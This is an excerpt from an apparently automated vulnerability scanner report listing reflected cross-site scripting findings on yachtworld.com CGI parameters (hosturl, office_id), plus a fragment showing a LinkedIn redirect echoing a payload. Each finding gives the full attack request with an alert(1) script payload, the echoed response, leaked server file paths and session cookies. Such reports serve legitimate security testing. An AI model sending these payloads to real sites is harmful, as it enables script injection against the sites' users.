Date: Thu, 27 Jan 2011 19:50:10 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19965645525d5f4f58455e445a4a421968;expires=Thu, 27-Jan-2011 20:20:19 GMT;path=/;httponly

<!DOCTYPE html>
<html>
<head title="Redirecting...">
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<meta name="pagekey" content="external_redirect" />
<style type="
...[SNIP]...
<script type="text/javascript">window.location.replace('http://www.linkedin.com/secureb47a6'-alert(1)-'f2583992d5c/login');</script>
...[SNIP]...

3.85. http://www.yachtworld.com/bluewater/bluewater_1.cgi [hosturl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /bluewater/bluewater_1.cgi

Issue detail

The value of the hosturl request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 30b6e><script>alert(1)</script>9e5aaf9f068 was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bluewater/bluewater_1.cgi?company=bluewater&limit=50&type=&new=&units=Feet&hosturl=bluewater30b6e><script>alert(1)</script>9e5aaf9f068&page=broker HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/privatelabel/listing/cache/pl_search_results.jsp?slim=pp221796&currency=USD&units=Feet&currencyid=100&ps=100&slim=pp221796&uom=126&sm=3&duom=126&is=false&incnt=51447&wuom=126&currencyid=100&luom=126&so=0&ps=100&n=1:8:4:380:51447&searchPage=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; latestSavedSearches=1_0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.23.10.1296155835; s_pers=%20s_nr%3D1296157077414%7C1298749077414%3B%20s_lv%3D1296157077416%7C1390765077416%3B%20s_lv_s%3DFirst%2520Visit%7C1296158877416%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253Dhttp%2525253A//www.yachtworld.com/privatelabel/listing/cache/pl_search_results.jsp%2525253Fslim%2525253Dpp221796%25252526currency%2525253DUSD%25252526units%2525253DFeet%25252526currencyid%2525253D100%25252526ps%2525253D100%25252526slim%2525253Dpp221796%25252526uom%2525253D126%25252526sm%2525253D3%25252526duom%2525253D126%25252526is%2525253Dfalse%25252526incnt%2525253D51447%25252526wuom%2525253D126%25252526currencyid%2525253D100%25252526luom%2525253D126%25252526so%2525253D0%25252526ps%2525253D100%25252526n%2525253D1%2525253A8%2525253A4%2525253A380%2525253A51447%25252526%252526oid%25253Dhttp%2525253A//www.yachtworld.com/bluewater/bluewater_1.cgi%2525253Fcompany%2525253Dbluewater%25252526limit%2525253D50%25252526type%2525253D%25252526new%2525253D%25252526units%2525253DFeet%252526ot%25253DA%3B

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 20:59:51 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 63115

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


<!-- /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/bluewater30b6e><scr
...[SNIP]...
<a href=/core/listing/video_gallery.jsp?boat_id=1558604&hosturl=bluewater30b6e><script>alert(1)</script>9e5aaf9f068&&ywo=bluewater&&ybw= onClick="return popup(this, 'notes')">
...[SNIP]...

3.86. http://www.yachtworld.com/bluewater/bluewater_1.cgi [hosturl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /bluewater/bluewater_1.cgi

Issue detail

The value of the hosturl request parameter is copied into an HTML comment. The payload 5ada6--><script>alert(1)</script>b8852678aaf was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /bluewater/bluewater_1.cgi?company=bluewater&limit=50&type=&new=&units=Feet&hosturl=bluewater5ada6--><script>alert(1)</script>b8852678aaf&page=broker HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/privatelabel/listing/cache/pl_search_results.jsp?slim=pp221796&currency=USD&units=Feet&currencyid=100&ps=100&slim=pp221796&uom=126&sm=3&duom=126&is=false&incnt=51447&wuom=126&currencyid=100&luom=126&so=0&ps=100&n=1:8:4:380:51447&searchPage=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; latestSavedSearches=1_0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.23.10.1296155835; s_pers=%20s_nr%3D1296157077414%7C1298749077414%3B%20s_lv%3D1296157077416%7C1390765077416%3B%20s_lv_s%3DFirst%2520Visit%7C1296158877416%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253Dhttp%2525253A//www.yachtworld.com/privatelabel/listing/cache/pl_search_results.jsp%2525253Fslim%2525253Dpp221796%25252526currency%2525253DUSD%25252526units%2525253DFeet%25252526currencyid%2525253D100%25252526ps%2525253D100%25252526slim%2525253Dpp221796%25252526uom%2525253D126%25252526sm%2525253D3%25252526duom%2525253D126%25252526is%2525253Dfalse%25252526incnt%2525253D51447%25252526wuom%2525253D126%25252526currencyid%2525253D100%25252526luom%2525253D126%25252526so%2525253D0%25252526ps%2525253D100%25252526n%2525253D1%2525253A8%2525253A4%2525253A380%2525253A51447%25252526%252526oid%25253Dhttp%2525253A//www.yachtworld.com/bluewater/bluewater_1.cgi%2525253Fcompany%2525253Dbluewater%25252526limit%2525253D50%25252526type%2525253D%25252526new%2525253D%25252526units%2525253DFeet%252526ot%25253DA%3B

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 21:00:03 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 63481

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


<!-- /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/bluewater5ada6--><script>alert(1)</script>b8852678aaf/boats.header.html:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/bluewater5ada6-->
...[SNIP]...

3.87. http://www.yachtworld.com/bluewater/bluewater_1.cgi [hosturl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /bluewater/bluewater_1.cgi

Issue detail

The value of the hosturl request parameter is copied into the HTML document as plain text between tags. The payload c9ea6<script>alert(1)</script>74d178365e9 was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bluewater/bluewater_1.cgi?company=bluewater&limit=50&type=&new=&units=Feet&hosturl=bluewaterc9ea6<script>alert(1)</script>74d178365e9&page=broker HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/privatelabel/listing/cache/pl_search_results.jsp?slim=pp221796&currency=USD&units=Feet&currencyid=100&ps=100&slim=pp221796&uom=126&sm=3&duom=126&is=false&incnt=51447&wuom=126&currencyid=100&luom=126&so=0&ps=100&n=1:8:4:380:51447&searchPage=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; latestSavedSearches=1_0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.23.10.1296155835; s_pers=%20s_nr%3D1296157077414%7C1298749077414%3B%20s_lv%3D1296157077416%7C1390765077416%3B%20s_lv_s%3DFirst%2520Visit%7C1296158877416%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253Dhttp%2525253A//www.yachtworld.com/privatelabel/listing/cache/pl_search_results.jsp%2525253Fslim%2525253Dpp221796%25252526currency%2525253DUSD%25252526units%2525253DFeet%25252526currencyid%2525253D100%25252526ps%2525253D100%25252526slim%2525253Dpp221796%25252526uom%2525253D126%25252526sm%2525253D3%25252526duom%2525253D126%25252526is%2525253Dfalse%25252526incnt%2525253D51447%25252526wuom%2525253D126%25252526currencyid%2525253D100%25252526luom%2525253D126%25252526so%2525253D0%25252526ps%2525253D100%25252526n%2525253D1%2525253A8%2525253A4%2525253A380%2525253A51447%25252526%252526oid%25253Dhttp%2525253A//www.yachtworld.com/bluewater/bluewater_1.cgi%2525253Fcompany%2525253Dbluewater%25252526limit%2525253D50%25252526type%2525253D%25252526new%2525253D%25252526units%2525253DFeet%252526ot%25253DA%3B

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 20:59:56 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 62732

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


<!-- /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/bluewaterc9ea6<scri
...[SNIP]...
</script>74d178365e9/boats.footer.html:--> Exception while reading the file:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/bluewaterc9ea6<script>alert(1)</script>74d178365e9/boats.header.html exception is java.io.FileNotFoundException: /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/bluewaterc9ea6<script>
...[SNIP]...

3.88. http://www.yachtworld.com/bluewater/email.cgi [office_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /bluewater/email.cgi

Issue detail

The value of the office_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 925d7"><script>alert(1)</script>61a123d4d1a was submitted in the office_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bluewater/email.cgi?url=bluewater&office_id=7582925d7"><script>alert(1)</script>61a123d4d1a&boat_id=2061801&hosturl=bluewater&&ywo=bluewater&&includeNav=true HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 22:59:47 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
